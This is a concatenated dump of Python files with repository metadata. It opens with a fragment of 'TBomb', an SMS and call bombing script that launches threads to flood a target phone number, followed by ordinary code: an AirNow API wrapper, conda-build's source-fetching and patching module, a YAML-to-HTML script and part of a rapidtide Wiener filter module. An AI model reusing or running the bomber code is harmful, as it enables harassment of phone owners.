cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 106]  # 105 has no handler in getapi, so it would always fail
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tTBomb Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
sent = count_inf
print(" Total Number of Requests Sent : ", sent)
if sent > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
| 56.410138
| 2,211
| 0.611143
|
4a18f54bb8d2db5ae4294422029b6b66a0b1b488
| 1,623
|
py
|
Python
|
api.py
|
Demojh8/airnow
|
fce5fa150bb5e6f460dd91da70ca46edbd9c66ee
|
[
"MIT"
] | null | null | null |
api.py
|
Demojh8/airnow
|
fce5fa150bb5e6f460dd91da70ca46edbd9c66ee
|
[
"MIT"
] | null | null | null |
api.py
|
Demojh8/airnow
|
fce5fa150bb5e6f460dd91da70ca46edbd9c66ee
|
[
"MIT"
] | null | null | null |
import urllib2
import json
import datetime
class ApiBase:
def _makeRequest(self, url):
request = urllib2.Request(url)
opener = urllib2.build_opener()
response = opener.open(request)
responseStatusCode = response.getcode()
return response, responseStatusCode
class AirNow_Curr(ApiBase):
apiUrl = 'http://www.airnowapi.org/aq/observation/zipCode/current/?format'
def __init__(self, apiKey, format = 'application/json', distance = '25'):
self.apiKey = apiKey
self.format = format
self.distance = distance
def makeRequest(self, zipcode):
url = '%s=%s&zipCode=%s&distance=%s&API_KEY=%s' % (self.apiUrl, self.format, zipcode, self.distance, self.apiKey)
response, responseStatusCode = self._makeRequest(url)
jsonResponse = json.loads(response.read())
return jsonResponse, responseStatusCode
class AirNow_Pred(ApiBase):
apiUrl = 'http://www.airnowapi.org/aq/forecast/zipCode/?format'
def __init__(self, apiKey, format = 'application/json', distance = '25'):
self.apiKey = apiKey
self.format = format
self.distance = distance
def makeRequest(self, zipcode):
url = '%s=%s&zipCode=%s&date=%s&distance=%s&API_KEY=%s' % (self.apiUrl, self.format, zipcode,datetime.datetime.now().date().strftime("%Y-%m-%d"),self.distance, self.apiKey)
response, responseStatusCode = self._makeRequest(url)
jsonResponse = json.loads(response.read())
return jsonResponse, responseStatusCode
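# A minimal usage sketch (hypothetical API key and ZIP code; both wrappers return
# the parsed JSON body together with the HTTP status code):
#
#     curr = AirNow_Curr('YOUR_API_KEY')
#     observations, status = curr.makeRequest('20002')
#
#     pred = AirNow_Pred('YOUR_API_KEY')
#     forecast, status = pred.makeRequest('20002')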
| 32.46
| 181
| 0.643869
|
4a18f746ee4fc2cb6de4e7ff6c365873a85b2726
| 26,833
|
py
|
Python
|
conda_build/source.py
|
gabm/conda-build
|
6720ae109a5d08737786d950687b9fdc48c05e16
|
[
"BSD-3-Clause"
] | null | null | null |
conda_build/source.py
|
gabm/conda-build
|
6720ae109a5d08737786d950687b9fdc48c05e16
|
[
"BSD-3-Clause"
] | null | null | null |
conda_build/source.py
|
gabm/conda-build
|
6720ae109a5d08737786d950687b9fdc48c05e16
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import, division, print_function
import io
import locale
import os
from os.path import join, isdir, isfile, abspath, basename, exists, normpath, expanduser
import re
import shutil
from subprocess import CalledProcessError
import sys
import time
from .conda_interface import download, TemporaryDirectory
from .conda_interface import hashsum_file
from conda_build.os_utils import external
from conda_build.conda_interface import url_path, CondaHTTPError
from conda_build.utils import (tar_xf, unzip, safe_print_unicode, copy_into, on_win, ensure_list,
check_output_env, check_call_env, convert_path_for_cygwin_or_msys2,
get_logger, rm_rf, LoggingContext)
if on_win:
from conda_build.utils import convert_unix_path_to_win
if sys.version_info[0] == 3:
from urllib.parse import urljoin
else:
from urlparse import urljoin
git_submod_re = re.compile(r'(?:.+)\.(.+)\.(?:.+)\s(.+)')
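# e.g. git_submod_re.match('submodule.foo.url ../bar').groups() == ('foo', '../bar')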
ext_re = re.compile(r"(.*?)(\.(?:tar\.)?[^.]+)$")
def append_hash_to_fn(fn, hash_value):
return ext_re.sub(r"\1_{}\2".format(hash_value[:10]), fn)
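# e.g. append_hash_to_fn('pkg-1.0.tar.gz', '0123456789abcdef') == 'pkg-1.0_0123456789.tar.gz'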
def download_to_cache(cache_folder, recipe_path, source_dict):
''' Download a source to the local cache. '''
print('Source cache directory is: %s' % cache_folder)
if not isdir(cache_folder):
os.makedirs(cache_folder)
fn = source_dict['fn'] if 'fn' in source_dict else basename(source_dict['url'])
hash_added = False
for hash_type in ('md5', 'sha1', 'sha256'):
if hash_type in source_dict:
fn = append_hash_to_fn(fn, source_dict[hash_type])
hash_added = True
break
else:
log = get_logger(__name__)
log.warn("No hash (md5, sha1, sha256) provided. Source download forced. "
"Add hash to recipe to use source cache.")
path = join(cache_folder, fn)
if isfile(path):
print('Found source in cache: %s' % fn)
else:
print('Downloading source to cache: %s' % fn)
if not isinstance(source_dict['url'], list):
source_dict['url'] = [source_dict['url']]
for url in source_dict['url']:
if "://" not in url:
if url.startswith('~'):
url = expanduser(url)
if not os.path.isabs(url):
url = os.path.normpath(os.path.join(recipe_path, url))
url = url_path(url)
else:
if url.startswith('file:///~'):
url = 'file:///' + expanduser(url[8:]).replace('\\', '/')
try:
print("Downloading %s" % url)
with LoggingContext():
download(url, path)
except CondaHTTPError as e:
print("Error: %s" % str(e).strip(), file=sys.stderr)
except RuntimeError as e:
print("Error: %s" % str(e).strip(), file=sys.stderr)
else:
print("Success")
break
else: # no break
raise RuntimeError("Could not download %s" % url)
hashed = None
for tp in ('md5', 'sha1', 'sha256'):
if tp in source_dict:
expected_hash = source_dict[tp]
hashed = hashsum_file(path, tp)
if expected_hash != hashed:
raise RuntimeError("%s mismatch: '%s' != '%s'" %
(tp.upper(), hashed, expected_hash))
break
# this is really a fallback. If people don't provide the hash, we still need to prevent
# collisions in our source cache, but the end user will get no benefit from the cache.
if not hash_added:
if not hashed:
hashed = hashsum_file(path, 'sha256')
dest_path = append_hash_to_fn(path, hashed)
os.rename(path, dest_path)
path = dest_path
return path
def hoist_single_extracted_folder(nested_folder):
"""Moves all files/folders one level up.
This is for when your archive extracts into its own folder, so that we don't need to
know exactly what that folder is called."""
flist = os.listdir(nested_folder)
parent = os.path.dirname(nested_folder)
for thing in flist:
if not os.path.isdir(os.path.join(parent, thing)):
shutil.move(os.path.join(nested_folder, thing), os.path.join(parent, thing))
else:
copy_into(os.path.join(nested_folder, thing), os.path.join(parent, thing))
nested_folder = os.path.join(nested_folder, thing)
rm_rf(nested_folder)
def unpack(source_dict, src_dir, cache_folder, recipe_path, croot, verbose=False,
timeout=90, locking=True):
''' Uncompress a downloaded source. '''
src_path = download_to_cache(cache_folder, recipe_path, source_dict)
if not isdir(src_dir):
os.makedirs(src_dir)
if verbose:
print("Extracting download")
with TemporaryDirectory(dir=croot) as tmpdir:
if src_path.lower().endswith(('.tar.gz', '.tar.bz2', '.tgz', '.tar.xz',
'.tar', 'tar.z')):
tar_xf(src_path, tmpdir)
elif src_path.lower().endswith('.zip'):
unzip(src_path, tmpdir)
elif src_path.lower().endswith('.whl'):
# copy wheel itself *and* unpack it
# This allows test_files or about.license_file to locate files in the wheel,
# as well as `pip install name-version.whl` as install command
unzip(src_path, tmpdir)
copy_into(src_path, tmpdir, timeout, locking=locking)
else:
# In this case, the build script will need to deal with unpacking the source
print("Warning: Unrecognized source format. Source file will be copied to the SRC_DIR")
copy_into(src_path, tmpdir, timeout, locking=locking)
flist = os.listdir(tmpdir)
folder = os.path.join(tmpdir, flist[0])
if len(flist) == 1 and os.path.isdir(folder):
hoist_single_extracted_folder(folder)
flist = os.listdir(tmpdir)
for f in flist:
shutil.move(os.path.join(tmpdir, f), os.path.join(src_dir, f))
def git_mirror_checkout_recursive(git, mirror_dir, checkout_dir, git_url, git_cache, git_ref=None,
git_depth=-1, is_top_level=True, verbose=True):
""" Mirror (and checkout) a Git repository recursively.
It's not possible to use `git submodule` on a bare
repository, so the checkout must be done before we
know which submodules there are.
Worse, submodules can be identified by using either
absolute URLs or relative paths. If relative paths
are used those need to be relocated upon mirroring,
but you could end up with `../../../../blah` and in
that case conda-build could be tricked into writing
to the root of the drive and overwriting the system
folders unless steps are taken to prevent that.
"""
if verbose:
stdout = None
stderr = None
else:
FNULL = open(os.devnull, 'w')
stdout = FNULL
stderr = FNULL
if not mirror_dir.startswith(git_cache + os.sep):
sys.exit("Error: Attempting to mirror to %s which is outside of GIT_CACHE %s"
% (mirror_dir, git_cache))
# This is necessary for Cygwin git and m2-git, although it is fixed in newer MSYS2.
git_mirror_dir = convert_path_for_cygwin_or_msys2(git, mirror_dir)
git_checkout_dir = convert_path_for_cygwin_or_msys2(git, checkout_dir)
if not isdir(os.path.dirname(mirror_dir)):
os.makedirs(os.path.dirname(mirror_dir))
if isdir(mirror_dir):
if git_ref != 'HEAD':
check_call_env([git, 'fetch'], cwd=mirror_dir, stdout=stdout, stderr=stderr)
else:
# Unlike 'git clone', fetch doesn't automatically update the cache's HEAD,
# So here we explicitly store the remote HEAD in the cache's local refs/heads,
# and then explicitly set the cache's HEAD.
# This is important when the git repo is a local path like "git_url: ../",
# but the user is working with a branch other than 'master' without
# explicitly providing git_rev.
check_call_env([git, 'fetch', 'origin', '+HEAD:_conda_cache_origin_head'],
cwd=mirror_dir, stdout=stdout, stderr=stderr)
check_call_env([git, 'symbolic-ref', 'HEAD', 'refs/heads/_conda_cache_origin_head'],
cwd=mirror_dir, stdout=stdout, stderr=stderr)
else:
args = [git, 'clone', '--mirror']
if git_depth > 0:
args += ['--depth', str(git_depth)]
try:
check_call_env(args + [git_url, git_mirror_dir], stdout=stdout, stderr=stderr)
except CalledProcessError:
# on windows, remote URL comes back to us as cygwin or msys format. Python doesn't
# know how to normalize it. Need to convert it to a windows path.
if sys.platform == 'win32' and git_url.startswith('/'):
git_url = convert_unix_path_to_win(git_url)
if os.path.exists(git_url):
# Local filepaths are allowed, but make sure we normalize them
git_url = normpath(git_url)
check_call_env(args + [git_url, git_mirror_dir], stdout=stdout, stderr=stderr)
assert isdir(mirror_dir)
# Now clone from mirror_dir into checkout_dir.
check_call_env([git, 'clone', git_mirror_dir, git_checkout_dir], stdout=stdout, stderr=stderr)
if is_top_level:
checkout = git_ref
if git_url.startswith('.'):
output = check_output_env([git, "rev-parse", checkout], stdout=stdout, stderr=stderr)
checkout = output.decode('utf-8')
if verbose:
print('checkout: %r' % checkout)
if checkout:
check_call_env([git, 'checkout', checkout],
cwd=checkout_dir, stdout=stdout, stderr=stderr)
# submodules may have been specified using relative paths.
# Those paths are relative to git_url, and will not exist
# relative to mirror_dir, unless we do some work to make
# it so.
try:
submodules = check_output_env([git, 'config', '--file', '.gitmodules', '--get-regexp',
'url'], stderr=stdout, cwd=checkout_dir)
submodules = submodules.decode('utf-8').splitlines()
except CalledProcessError:
submodules = []
for submodule in submodules:
matches = git_submod_re.match(submodule)
if matches and matches.group(2)[0] == '.':
submod_name = matches.group(1)
submod_rel_path = matches.group(2)
submod_url = urljoin(git_url + '/', submod_rel_path)
submod_mirror_dir = os.path.normpath(
os.path.join(mirror_dir, submod_rel_path))
if verbose:
print('Relative submodule %s found: url is %s, submod_mirror_dir is %s' % (
submod_name, submod_url, submod_mirror_dir))
with TemporaryDirectory() as temp_checkout_dir:
git_mirror_checkout_recursive(git, submod_mirror_dir, temp_checkout_dir, submod_url,
git_cache=git_cache, git_ref=git_ref,
git_depth=git_depth, is_top_level=False,
verbose=verbose)
if is_top_level:
# Now that all relative-URL-specified submodules are locally mirrored to
# relatively the same place we can go ahead and checkout the submodules.
check_call_env([git, 'submodule', 'update', '--init',
'--recursive'], cwd=checkout_dir, stdout=stdout, stderr=stderr)
git_info(checkout_dir, verbose=verbose)
if not verbose:
FNULL.close()
def git_source(source_dict, git_cache, src_dir, recipe_path=None, verbose=True):
''' Download a source from a Git repo (or submodule, recursively) '''
if not isdir(git_cache):
os.makedirs(git_cache)
git = external.find_executable('git')
if not git:
sys.exit("Error: git is not installed in your root environment.")
git_url = source_dict['git_url']
git_depth = int(source_dict.get('git_depth', -1))
git_ref = source_dict.get('git_rev', 'HEAD')
if git_url.startswith('.'):
# It's a relative path from the conda recipe
git_url = abspath(normpath(os.path.join(recipe_path, git_url)))
if sys.platform == 'win32':
git_dn = git_url.replace(':', '_')
else:
git_dn = git_url[1:]
else:
git_dn = git_url.split('://')[-1].replace('/', os.sep)
if git_dn.startswith(os.sep):
git_dn = git_dn[1:]
git_dn = git_dn.replace(':', '_')
mirror_dir = join(git_cache, git_dn)
git_mirror_checkout_recursive(
git, mirror_dir, src_dir, git_url, git_cache=git_cache, git_ref=git_ref,
git_depth=git_depth, is_top_level=True, verbose=verbose)
return git
def git_info(src_dir, verbose=True, fo=None):
''' Print info about a Git repo. '''
assert isdir(src_dir)
git = external.find_executable('git')
if not git:
log = get_logger(__name__)
log.warn("git not installed in root environment. Skipping recording of git info.")
return
if verbose:
stderr = None
else:
FNULL = open(os.devnull, 'w')
stderr = FNULL
# Ensure to explicitly set GIT_DIR as some Linux machines will not
# properly execute without it.
env = os.environ.copy()
env['GIT_DIR'] = join(src_dir, '.git')
env = {str(key): str(value) for key, value in env.items()}
for cmd, check_error in [
('git log -n1', True),
('git describe --tags --dirty', False),
('git status', True)]:
try:
stdout = check_output_env(cmd.split(), stderr=stderr, cwd=src_dir, env=env)
except CalledProcessError as e:
    if check_error:
        raise Exception("git error: %s" % str(e))
    continue  # optional command failed (e.g. 'git describe' with no tags); skip its output
encoding = locale.getpreferredencoding()
if not fo:
encoding = sys.stdout.encoding
encoding = encoding or 'utf-8'
if hasattr(stdout, 'decode'):
stdout = stdout.decode(encoding, 'ignore')
if fo:
fo.write(u'==> %s <==\n' % cmd)
if verbose:
fo.write(stdout + u'\n')
else:
if verbose:
print(u'==> %s <==\n' % cmd)
safe_print_unicode(stdout + u'\n')
def hg_source(source_dict, src_dir, hg_cache, verbose):
''' Download a source from Mercurial repo. '''
if verbose:
stdout = None
stderr = None
else:
FNULL = open(os.devnull, 'w')
stdout = FNULL
stderr = FNULL
hg_url = source_dict['hg_url']
if not isdir(hg_cache):
os.makedirs(hg_cache)
hg_dn = hg_url.split(':')[-1].replace('/', '_')
cache_repo = join(hg_cache, hg_dn)
if isdir(cache_repo):
check_call_env(['hg', 'pull'], cwd=cache_repo, stdout=stdout, stderr=stderr)
else:
check_call_env(['hg', 'clone', hg_url, cache_repo], stdout=stdout, stderr=stderr)
assert isdir(cache_repo)
# now clone in to work directory
update = source_dict.get('hg_tag') or 'tip'
if verbose:
print('checkout: %r' % update)
check_call_env(['hg', 'clone', cache_repo, src_dir], stdout=stdout,
stderr=stderr)
check_call_env(['hg', 'update', '-C', update], cwd=src_dir, stdout=stdout,
stderr=stderr)
if not verbose:
FNULL.close()
return src_dir
def svn_source(source_dict, src_dir, svn_cache, verbose=True, timeout=90, locking=True):
''' Download a source from SVN repo. '''
if verbose:
stdout = None
stderr = None
else:
FNULL = open(os.devnull, 'w')
stdout = FNULL
stderr = FNULL
def parse_bool(s):
return str(s).lower().strip() in ('yes', 'true', '1', 'on')
svn_url = source_dict['svn_url']
svn_revision = source_dict.get('svn_rev') or 'head'
svn_ignore_externals = parse_bool(source_dict.get('svn_ignore_externals') or 'no')
if not isdir(svn_cache):
os.makedirs(svn_cache)
svn_dn = svn_url.split(':', 1)[-1].replace('/', '_').replace(':', '_')
cache_repo = join(svn_cache, svn_dn)
if svn_ignore_externals:
extra_args = ['--ignore-externals']
else:
extra_args = []
if isdir(cache_repo):
check_call_env(['svn', 'up', '-r', svn_revision] + extra_args, cwd=cache_repo,
stdout=stdout, stderr=stderr)
else:
check_call_env(['svn', 'co', '-r', svn_revision] + extra_args + [svn_url, cache_repo],
stdout=stdout, stderr=stderr)
assert isdir(cache_repo)
# now copy into work directory
copy_into(cache_repo, src_dir, timeout, symlinks=True, locking=locking)
if not verbose:
FNULL.close()
return src_dir
def get_repository_info(recipe_path):
"""This tries to get information about where a recipe came from. This is different
from the source - you can have a recipe in svn that gets source via git."""
try:
if exists(join(recipe_path, ".git")):
origin = check_output_env(["git", "config", "--get", "remote.origin.url"],
cwd=recipe_path)
rev = check_output_env(["git", "rev-parse", "HEAD"], cwd=recipe_path)
return "Origin {}, commit {}".format(origin, rev)
elif isdir(join(recipe_path, ".hg")):
origin = check_output_env(["hg", "paths", "default"], cwd=recipe_path)
rev = check_output_env(["hg", "id"], cwd=recipe_path).split()[0]
return "Origin {}, commit {}".format(origin, rev)
elif isdir(join(recipe_path, ".svn")):
info = check_output_env(["svn", "info"], cwd=recipe_path)
server = re.search("Repository Root: (.*)$", info, flags=re.M).group(1)
revision = re.search("Revision: (.*)$", info, flags=re.M).group(1)
return "{}, Revision {}".format(server, revision)
else:
return "{}, last modified {}".format(recipe_path,
time.ctime(os.path.getmtime(
join(recipe_path, "meta.yaml"))))
except CalledProcessError:
get_logger(__name__).debug("Failed to checkout source in " + recipe_path)
return "{}, last modified {}".format(recipe_path,
time.ctime(os.path.getmtime(
join(recipe_path, "meta.yaml"))))
def _ensure_unix_line_endings(path):
"""Replace windows line endings with Unix. Return path to modified file."""
out_path = path + "_unix"
with open(path, "rb") as inputfile:
with open(out_path, "wb") as outputfile:
for line in inputfile:
outputfile.write(line.replace(b"\r\n", b"\n"))
return out_path
def _ensure_win_line_endings(path):
"""Replace unix line endings with win. Return path to modified file."""
out_path = path + "_win"
with open(path, "rb") as inputfile:
with open(out_path, "wb") as outputfile:
for line in inputfile:
outputfile.write(line.replace(b"\n", b"\r\n"))
return out_path
def _guess_patch_strip_level(filesstr, src_dir):
""" Determine the patch strip level automatically. """
maxlevel = None
files = {filestr.encode(errors='ignore') for filestr in filesstr}
src_dir = src_dir.encode(errors='ignore')
for file in files:
numslash = file.count(b'/')
maxlevel = numslash if maxlevel is None else min(maxlevel, numslash)
if maxlevel == 0:
patchlevel = 0
else:
        histo = {i: 0 for i in range(maxlevel + 1)}
for file in files:
parts = file.split(b'/')
for level in range(maxlevel + 1):
if os.path.exists(join(src_dir, *parts[-len(parts) + level:])):
histo[level] += 1
order = sorted(histo, key=histo.get, reverse=True)
        if histo[order[0]] == histo[order[1]]:
            print("Patch level ambiguous, selecting least deep")
        patchlevel = min([key for key, value
                          in histo.items() if value == histo[order[0]]])
return patchlevel
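# Worked example (hypothetical paths): if a patch touches 'a/src/foo.c' and
# 'a/src/bar.c', maxlevel is 2; the histogram then counts, for each candidate
# strip level, how many of the stripped paths actually exist under src_dir,
# and the most frequently matching level wins (the least deep one on ties).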
def _get_patch_file_details(path):
    re_files = re.compile(r'^(?:---|\+\+\+) ([^\n\t]+)')
    with io.open(path, errors='ignore') as f:
        files = []
first_line = True
is_git_format = True
for l in f.readlines():
if first_line and not re.match('From [0-9a-f]{40}', l):
is_git_format = False
first_line = False
m = re_files.search(l)
if m and m.group(1) != '/dev/null':
files.append(m.group(1))
elif is_git_format and l.startswith('git') and not l.startswith('git --diff'):
is_git_format = False
return (files, is_git_format)
def apply_patch(src_dir, path, config, git=None):
if not isfile(path):
sys.exit('Error: no such patch: %s' % path)
files, is_git_format = _get_patch_file_details(path)
if git and is_git_format:
# Prevents git from asking interactive questions,
# also necessary to achieve sha1 reproducibility;
# as is --committer-date-is-author-date. By this,
# we mean a round-trip of git am/git format-patch
# gives the same file.
git_env = os.environ
git_env['GIT_COMMITTER_NAME'] = 'conda-build'
git_env['GIT_COMMITTER_EMAIL'] = 'conda@conda-build.org'
check_call_env([git, 'am', '--committer-date-is-author-date', path],
cwd=src_dir, stdout=None, env=git_env)
config.git_commits_since_tag += 1
else:
print('Applying patch: %r' % path)
patch = external.find_executable('patch', config.build_prefix)
if patch is None:
sys.exit("""\
Error:
Cannot use 'git' (not a git repo and/or patch) and did not find 'patch' in: %s
You can install 'patch' using apt-get, yum (Linux), Xcode (MacOSX),
or conda, m2-patch (Windows),
""" % (os.pathsep.join(external.dir_paths)))
patch_strip_level = _guess_patch_strip_level(files, src_dir)
patch_args = ['-p%d' % patch_strip_level, '-i', path]
# line endings are a pain.
# https://unix.stackexchange.com/a/243748/34459
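        # Fallback order used below: try the patch as-is; on Windows retry with
        # the file converted to LF endings; if that also fails, retry with CRLF
        # endings plus --binary so `patch` does not normalize line endings itself.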
try:
log = get_logger(__name__)
log.info("Trying to apply patch as-is")
check_call_env([patch] + patch_args, cwd=src_dir)
except CalledProcessError:
if sys.platform == 'win32':
unix_ending_file = _ensure_unix_line_endings(path)
patch_args[-1] = unix_ending_file
try:
log.info("Applying unmodified patch failed. "
"Convert to unix line endings and trying again.")
check_call_env([patch] + patch_args, cwd=src_dir)
                except CalledProcessError:
                    log.info("Applying unix patch failed. "
                             "Converting to CRLF line endings and trying again with --binary.")
patch_args.insert(0, '--binary')
win_ending_file = _ensure_win_line_endings(path)
patch_args[-1] = win_ending_file
try:
check_call_env([patch] + patch_args, cwd=src_dir)
finally:
if os.path.exists(win_ending_file):
os.remove(win_ending_file) # clean up .patch_win file
finally:
if os.path.exists(unix_ending_file):
os.remove(unix_ending_file) # clean up .patch_unix file
else:
raise
def provide(metadata, patch=True):
"""
given a recipe_dir:
- download (if necessary)
- unpack
- apply patches (if any)
"""
meta = metadata.get_section('source')
if not os.path.isdir(metadata.config.build_folder):
os.makedirs(metadata.config.build_folder)
git = None
if hasattr(meta, 'keys'):
dicts = [meta]
else:
dicts = meta
for source_dict in dicts:
folder = source_dict.get('folder')
src_dir = (os.path.join(metadata.config.work_dir, folder) if folder else
metadata.config.work_dir)
if any(k in source_dict for k in ('fn', 'url')):
unpack(source_dict, src_dir, metadata.config.src_cache, recipe_path=metadata.path,
croot=metadata.config.croot, verbose=metadata.config.verbose,
timeout=metadata.config.timeout, locking=metadata.config.locking)
elif 'git_url' in source_dict:
git = git_source(source_dict, metadata.config.git_cache, src_dir, metadata.path,
verbose=metadata.config.verbose)
        # Build to make sure we have a work directory with source in it. We want
        # to make sure that whatever version is there does not interfere with
        # the test we run next.
elif 'hg_url' in source_dict:
hg_source(source_dict, src_dir, metadata.config.hg_cache,
verbose=metadata.config.verbose)
elif 'svn_url' in source_dict:
svn_source(source_dict, src_dir, metadata.config.svn_cache,
verbose=metadata.config.verbose, timeout=metadata.config.timeout,
locking=metadata.config.locking)
elif 'path' in source_dict:
path = normpath(abspath(join(metadata.path, source_dict['path'])))
if metadata.config.verbose:
print("Copying %s to %s" % (path, src_dir))
# careful here: we set test path to be outside of conda-build root in setup.cfg.
# If you don't do that, this is a recursive function
copy_into(path, src_dir, metadata.config.timeout, symlinks=True,
locking=metadata.config.locking, clobber=True)
else: # no source
if not isdir(src_dir):
os.makedirs(src_dir)
if patch:
patches = ensure_list(source_dict.get('patches', []))
            # use a separate loop variable so the `patch` argument is not shadowed
            for patch_path in patches:
                apply_patch(src_dir, join(metadata.path, patch_path), metadata.config, git)
return metadata.config.work_dir
| 41.60155
| 100
| 0.595051
|
4a18f78736b84b0454cdb59a1321f03b0af27ae4
| 633
|
py
|
Python
|
scripts/make_html.py
|
dannguyen/smalldata
|
73db5892e0cf6ae1e338c343b2f1b0c3d1c131b3
|
[
"MIT"
] | 4
|
2016-10-23T00:37:02.000Z
|
2021-02-28T03:59:16.000Z
|
scripts/make_html.py
|
dannguyen/smalldata
|
73db5892e0cf6ae1e338c343b2f1b0c3d1c131b3
|
[
"MIT"
] | null | null | null |
scripts/make_html.py
|
dannguyen/smalldata
|
73db5892e0cf6ae1e338c343b2f1b0c3d1c131b3
|
[
"MIT"
] | 1
|
2020-04-28T06:31:58.000Z
|
2020-04-28T06:31:58.000Z
|
import argparse
from sys import stdout, stderr
from settings import create_dataset_object,\
dataset_template
import yaml
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Print out an HTML version of a dataset YAML file")
parser.add_argument('infile', type=argparse.FileType('r'),
help="The name of a dataset YAML file")
args = parser.parse_args()
metaname = args.infile
stderr.write("Reading meta from %s\n" % metaname.name)
    d = create_dataset_object(yaml.safe_load(metaname.read()))
stdout.write(dataset_template(d))
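# Usage sketch (hypothetical file name):
#     python make_html.py dataset.yaml > dataset.html
# The progress message goes to stderr; the rendered HTML goes to stdout.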
| 33.315789
| 85
| 0.71564
|
4a18f859f60cd8803a596c795d038c3335799e66
| 4,353
|
py
|
Python
|
rapidtide/wiener.py
|
bbfrederick/rapidtide
|
ddd1899a93fafd550feb134debdd028bbba8c853
|
[
"Apache-2.0"
] | 44
|
2017-01-19T10:12:39.000Z
|
2022-02-08T05:43:58.000Z
|
rapidtide/wiener.py
|
bbfrederick/delaytools
|
190d79ae4c19317dfce38a528e43fd05459f29a5
|
[
"Apache-2.0"
] | 70
|
2018-05-02T14:35:45.000Z
|
2022-03-18T17:43:33.000Z
|
rapidtide/wiener.py
|
bbfrederick/delaytools
|
190d79ae4c19317dfce38a528e43fd05459f29a5
|
[
"Apache-2.0"
] | 12
|
2019-02-12T20:40:27.000Z
|
2021-06-16T13:28:21.000Z
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
#
# Copyright 2016-2021 Blaise Frederick
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# $Author: frederic $
# $Date: 2016/07/11 14:50:43 $
# $Id: rapidtide,v 1.161 2016/07/11 14:50:43 frederic Exp $
#
#
#
import numpy as np
import rapidtide.fit as tide_fit
import rapidtide.multiproc as tide_multiproc
import rapidtide.util as tide_util
def _procOneVoxelWiener(vox, lagtc, inittc, rt_floatset=np.float64, rt_floattype="float64"):
thefit, R = tide_fit.mlregress(lagtc, inittc)
fitcoff = rt_floatset(thefit[0, 1])
datatoremove = rt_floatset(fitcoff * lagtc)
return (
vox,
rt_floatset(thefit[0, 0]),
rt_floatset(R),
rt_floatset(R * R),
fitcoff,
rt_floatset(thefit[0, 1] / thefit[0, 0]),
datatoremove,
rt_floatset(inittc - datatoremove),
)
def wienerpass(
numspatiallocs,
reportstep,
fmri_data,
threshval,
lagtc,
optiondict,
wienerdeconv,
wpeak,
resampref_y,
rt_floatset=np.float64,
rt_floattype="float64",
):
inputshape = np.shape(fmri_data)
themask = np.where(np.mean(fmri_data, axis=1) > threshval, 1, 0)
if optiondict["nprocs"] > 1:
# define the consumer function here so it inherits most of the arguments
def Wiener_consumer(inQ, outQ):
while True:
try:
# get a new message
val = inQ.get()
# this is the 'TERM' signal
if val is None:
break
# process and send the data
outQ.put(
_procOneVoxelWiener(
val,
lagtc[val, :],
fmri_data[val, :],
rt_floatset=rt_floatset,
rt_floattype=rt_floattype,
)
)
except Exception as e:
print("error!", e)
break
data_out = tide_multiproc.run_multiproc(
Wiener_consumer,
inputshape,
themask,
nprocs=optiondict["nprocs"],
showprogressbar=True,
chunksize=optiondict["mp_chunksize"],
)
# unpack the data
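        # NOTE: meanvalue, rvalue, r2value, fitcoff, fitNorm, datatoremove and
        # filtereddata are assumed to be preallocated output arrays visible in
        # the enclosing scope; they are not defined inside this function.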
volumetotal = 0
for voxel in data_out:
meanvalue[voxel[0]] = voxel[1]
rvalue[voxel[0]] = voxel[2]
r2value[voxel[0]] = voxel[3]
fitcoff[voxel[0]] = voxel[4]
fitNorm[voxel[0]] = voxel[5]
datatoremove[voxel[0], :] = voxel[6]
filtereddata[voxel[0], :] = voxel[7]
volumetotal += 1
data_out = []
else:
volumetotal = 0
for vox in range(0, numspatiallocs):
if (vox % reportstep == 0 or vox == numspatiallocs - 1) and optiondict[
"showprogressbar"
]:
tide_util.progressbar(vox + 1, numspatiallocs, label="Percent complete")
inittc = fmri_data[vox, :].copy()
if np.mean(inittc) >= threshval:
(
dummy,
meanvalue[vox],
rvalue[vox],
r2value[vox],
fitcoff[vox],
fitNorm[vox],
datatoremove[vox],
filtereddata[vox],
) = _procOneVoxelWiener(
vox,
